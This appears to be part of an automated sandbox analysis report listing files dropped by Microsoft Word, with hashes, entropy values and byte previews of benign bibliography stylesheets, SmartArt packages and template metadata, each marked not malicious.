                                                                                      SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):254
                                                                                      Entropy (8bit):3.4845992218379616
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                      MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                      SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                      SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                      SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):6024
                                                                                      Entropy (8bit):7.886254023824049
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                      MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                      SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                      SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                      SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                      Malicious:false
                                                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):3.538396048757031
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                      SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                      SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                      SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):250983
                                                                                      Entropy (8bit):5.057714239438731
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                      MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                      SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                      SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                      SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):302
                                                                                      Entropy (8bit):3.537169234443227
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                      SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                      SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                      SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):217137
                                                                                      Entropy (8bit):5.068335381017074
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                      MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                      SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                      SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                      SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):332
                                                                                      Entropy (8bit):3.547857457374301
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                      SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                      SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                      SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):284415
                                                                                      Entropy (8bit):5.00549404077789
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                      MD5:33A829B4893044E1851725F4DAF20271
                                                                                      SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                      SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                      SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLouserzed">.. <xsl:choose>.. <xsl:when test="b:StyleNameLouserzed/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLouserzed/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):260
                                                                                      Entropy (8bit):3.494357416502254
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                      MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                      SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                      SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                      SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):6193
                                                                                      Entropy (8bit):7.855499268199703
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                      MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                      SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                      SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                      SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                      Malicious:false
                                                                                      Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):333258
                                                                                      Entropy (8bit):4.654450340871081
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                      MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                      SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                      SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                      SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):3.541819892045459
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                      SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                      SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                      SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):332
                                                                                      Entropy (8bit):3.4871192480632223
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                      SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                      SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                      SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):254875
                                                                                      Entropy (8bit):5.003842588822783
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                      MD5:377B3E355414466F3E3861BCE1844976
                                                                                      SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                      SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                      SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):16806
                                                                                      Entropy (8bit):7.9519793977093505
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                      MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                      SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                      SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                      SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                      Malicious:false
                                                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):254
                                                                                      Entropy (8bit):3.4720677950594836
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                      MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                      SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                      SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                      SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):3.4670546921349774
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                      MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                      SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                      SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                      SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                      Malicious:false
